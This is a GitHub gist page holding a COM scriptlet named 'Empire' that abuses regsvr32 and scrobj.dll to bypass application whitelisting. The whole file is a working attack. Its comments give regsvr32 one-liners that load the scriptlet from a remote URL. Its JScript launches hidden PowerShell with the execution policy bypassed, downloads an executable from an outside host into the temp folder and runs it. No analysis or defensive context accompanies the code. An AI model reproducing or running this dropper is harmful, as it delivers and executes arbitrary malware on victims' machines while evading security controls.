Skip to content

Instantly share code, notes, and snippets.

@Elm0D
Last active May 2, 2017 17:37
Show Gist options
  • Save Elm0D/3f043115622738f6b70b76f419d2b45f to your computer and use it in GitHub Desktop.
Save Elm0D/3f043115622738f6b70b76f419d2b45f to your computer and use it in GitHub Desktop.
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /i"C:\Bypass\STC_MsgBox.sct" scrobj.dll -->
<!-- regsvr32 /s /i:http://server/STC_MsgBox.sct scrobj.dll -->
<!-- That should work over a proxy and SSL/TLS... -->
<!-- regsvr32 /sh /i:https://gist.githubusercontent.com/Elm0D/3f043115622738f6b70b76f419d2b45f/raw/781e9577f64ef727fa131f0e3f958aaa73876d0e/STC_MsgBox.sct -->
<!-- regsvr32 /s /n /u /i:https://gist.githubusercontent.com/Elm0D/3f043115622738f6b70b76f419d2b45f/raw/781e9577f64ef727fa131f0e3f958aaa73876d0e/STC_MsgBox.sct scrobj.dll -->
<!-- Credits Of Concept - Casey Smith -->
<script language="JScript">
<![CDATA[
c = "$down = New-Object System.Net.WebClient;$url = 'http://servergames.xyz/VB6%20TestMsgBox.exe';$file = '%TMP%\test.exe';$down.DownloadFile($url,$file);$exec = New-Object -com shell.application;$exec.shellexecute($file); exit;";
ps = 'powershell.exe -ExecutionPolicy Bypass -windowstyle hidden ';
r = new ActiveXObject("WScript.Shell").Exec(ps + c);
]]>
</script>
</registration>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment